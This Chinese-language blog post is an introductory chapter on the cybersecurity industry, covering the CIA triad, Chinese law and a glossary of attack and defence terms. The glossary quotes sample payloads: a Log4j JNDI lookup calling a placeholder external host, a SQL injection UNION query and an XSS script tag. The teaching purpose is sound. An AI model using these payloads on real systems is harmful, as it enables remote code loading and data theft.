章节1 网络安全行业

47 阅读8分钟

开启掘金成长之旅!这是我参与「掘金日新计划 · 2 月更文挑战」的第 2 天,点击查看活动详情

第一章-网络安全行业

1.1-什么是网络安全

概念

网络安全:网络空间安全(Cyber Security)

信息系统

信息系统(Information System),是由计算机硬件、网络和通信设备、计算机软件、信息资源、信息用户和规章制度组成的以处理信息流为目的的人机一体化系统。

信息系统安全三要素(CIA)(面试基础考点)

  • 保密性(confidentiality) [ˌkɒnfɪˌdenʃiˈæləti]
  • 完整性(Integrity) [ɪnˈteɡrəti]
  • 可用性(Availability) [əˌveɪləˈbɪləti]

其他(了解)

  • 抗抵赖性
  • 可控性
  • 真实性、时效性、合规性、公平性、可靠性、隐私性

网络空间安全

包括了国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”

国家网络空间安全战略

网络空间和海、陆、空、天,并称为五大空间或五大疆域

www.cac.gov.cn/2016-12/27/…

网络空间关注点

  • 信息系统——网络空间域、物理空间域社会空间域
  • 技术——法律、政策、技术、管理、产业、教育
  • 信息系统生命周期——时时刻刻

网络空间管理

《中华人民共和国网络安全法》

《Cybersecurity Law of the People Republic of China》

网络空间安全管理流程

  1. 确定网络信息安全管理对象;
  2. 评估网络信息安全管理对象的价值;
  3. 识别网络信息安全管理对象的威胁;
  4. 识别网络信息安全管理对象的脆弱性;
  5. 确定网络信息安全管理对象的风险级别;
  6. 制定网络信息安全防范体系及防范措施;
  7. 实施和落实网络信息安全防范措施;
  8. 运行/维护网络信息安全设备、配置。

1.2-安全常用术语1

黑客hacker:对计算机非常擅长的人,窃取数据、破坏计算机系统(anonymous)

脚本小子:刚刚入门安全行业,学习了一些技术,只会只用现成的工具或者从网上复制代码

白帽子:白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题(360补天、漏洞盒子、CNVD、CNNVD)

红帽黑客:有正义感、爱国的黑客,利用技术维护国家网络安全,并且对外来的攻击进行反击

漏洞(vulnerability,简称vul或vuln):指的是硬件、软件、协议等等存在的安全缺陷(http://www/cnnvd.org.cn/web/wz/bzxqByld.tag?id=3&mkid=3)

POC(Proof of Concept):能证明漏洞存在的代码(例:${jndi:ldap://xxxxxx.dnslog.cn/test}

exp(Exploit——利用):执行了这一段利用代码之后,就能够达到攻击的目的(msf)

payload:攻击载荷;SQL注入——http://localhost/sqli-labs/Less-3/?id=-1')union select 1,1,database() --+;XSS——< script>alter(1)</ script>;log4j——${jndi:ldap://xxxxxx.domain.cn/test}

0day:使用量非常大的通用产品漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞

1day:漏洞的POC和EXP已经被公开了,但是很多人还来不及修复,这个叫1day漏洞

Nday漏洞:指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。

漏扫:基于数据库对漏洞进行自动化扫描

补丁(patch):漏洞的修复程序

1.2-安全常用术语2

渗透(penetration):黑客入侵了网站或者计算机系统,获取到控制计算机权限的过程

渗透测试(penetration test):用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据

木马(Trojan horse):隐藏在计算机中的恶意程序

病毒(Virus):恶意代码或程序

杀毒软件:瑞星、江民、金山、国外的诺顿、卡巴斯基、McAfee、360

免杀:绕过杀毒软件

肉鸡:已经被黑客获得权限的机器,可能是个人电脑也可能是企业或者政府单位的服务器,通常情况下因为使用者并不知道已经被入侵,所以黑客可以长期获得权限和控制。

抓鸡:利用出现概率非常高漏洞(比如log4j、永恒之蓝),使用自动化获取肉鸡的行为

跳板机:黑客为了防止被追溯和识别身份,一般都不会用自己的电脑发起攻击,而是利用获取的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色

DDoS(Distributed Denial of Service——分布式拒绝服务攻击):发起大量恶意请求,导致正常用户无法访问

后门(backdoor):黑客为了对主机进行长期的控制,在机器上种植的一段程序或留下一个“入口”

中间人攻击(Man-in-the-Middle Attack——MITM攻击):运行中间服务器,拦截并篡改数据

网络钓鱼:钓鱼网站指的是冒充的网站,用来窃取用户的账号密码

1.2-安全常用术语3

webshell

shell是一种命令执行工具,可以对计算机进行控制;

webshell就是asp、php、jsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做任意的操作

分类:小马;一句话木马——godzilla\behinder\ant sword;大马

Getshell:获得命令执行环境的操作;

Redis的持久化功能、MySQL的写文件功能、MySQL的日志记录功能、上传功能、数据备份功能、编辑器

提权:权限提升——Privilege Escalation;

普通用户权限,把自己提升为管理员权限的操作就叫做提权——www——root

拿站:指得到一个网站最高权限,即得到后台和管理员名字和密码

拖库(脱裤):拖库指的是网站被入侵以后,黑客把所有的数据都导出,窃取到了数据文件

撞库:用获得的裤子去批量登陆其他的网站

旁站入侵:入侵同服务器的其它网站

横向移动:攻击者入侵一台服务器成功后,基于内部网络,继续入侵同网段的其他机器

代理(Proxy):帮我们发起网络请求的一台服务器

VPN(Virtual Private Network):代理;加密通信;办公——在家里连接到公司内网

蜜罐(Honeypot):吸引攻击者攻击的伪装系统,用来实现溯源和反制

沙箱(Sandbox):沙箱是一种按照安全策略限制程序行为的执行环境,就算有恶意代码,也只能影响沙箱环境而不会影响到操作系统

靶场:模拟的有漏洞的环境;

可以是网站、容器、操作系统;

类型:

web综合靶场——DVWA、pikachu、bwapp

web专用靶场——sqli-labs、upload-labs、xsslabs

漏洞复现靶场——比如CVE 44228

操作系统靶场——比如vulnhub靶场

CTF靶场——专门用来练习CTF题目,每个人都有一个独立的环境

堡垒机:跳板机——jumpserver;

运维审计系统——管理资源,审批、审计、访问控制、事件记录

WAF:Web Application Firewall——Web应用防火墙;

对HTTP/HTTPS的流量内容进行分析,拦截恶意攻击行为

1.2-安全常用术语4

APT(Advanced Persistent Threat):APT攻击;

高级可持续威胁攻击,指某组织在网络上对待定对象展开的持续有效的攻击活动;

报告:2021深信服APT攻防趋势半年洞察

护网(HVV):国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习

CTF

Capture The Flag夺旗赛:起源于1996年DEFCON全球黑客大赛;解出题目,获得flag,就可以得分

是一种黑客技术竞赛:解题形式——Jeopardy;

攻防形式——Attack-Defense

方向:Reverse、PWN、Web、Crypto、Misc、Mobile

在线CTF:bugku——ctf.bugku.com/challenges/…

北京联合大学——buuoj.cn/challenges

CTFHub——www.ctfhub.com/

bmzCTF——bmzclub.cn/challenges

攻防世界——adworld.xctf.org.cn

CTFSHOW——ctf.show/challenges

CVE:Common Vulnerabilities and Exposures——通用漏洞披露;

Mitre;

例如:CVE-2021-44228

www.cve.org/

CNVD:国家信息安全漏洞共享平台——www.cnvd.org.cn/;

国家计算机应急响应中心CNCERT维护——www.cert.org.cn/publish/mai…

应急响应:一个公司为了应对各种安全事件所做的准备和事后采取的措施

SRC:Security Response Center——企业的应急响应中心;

0xsafe.org/

公益SRCwww.vulbox.com/;

src.sjtu.edu.cn/

网络空间测绘:网络空间资源收录;

网络空间搜索引擎:www.shodan.io

fofa.so

www.zoomeye.org

ATT&CK:Adversarial Tactics,Techniques,and Common Knowledge——对抗战术、技术和通用知识(攻击者技术的知识库);

Mitre;

风险分析模型——收集威胁情报,模拟APT攻击

逆向(reverse):把程序还原为源代码,分析程序的运行过程

DevOps(Development+Operations):开发测试运维一体化

CICD

包括:持续集成(Continuous Integration)

持续交付(Continuous Delivery)

持续部署(Continuous Deployment)

具体技术——Git代码管理、Jenkins版本管理、代码扫描、自动化测试

DevSecOps(Development + Security + Operations):安全开发与运维

等保:网络安全等级保护;

要求相关行业的单位和公司的信息系统必须进行定级,然后在公安机关备案,然后建设整改,然后由测评机构评级,并且持续维护和监督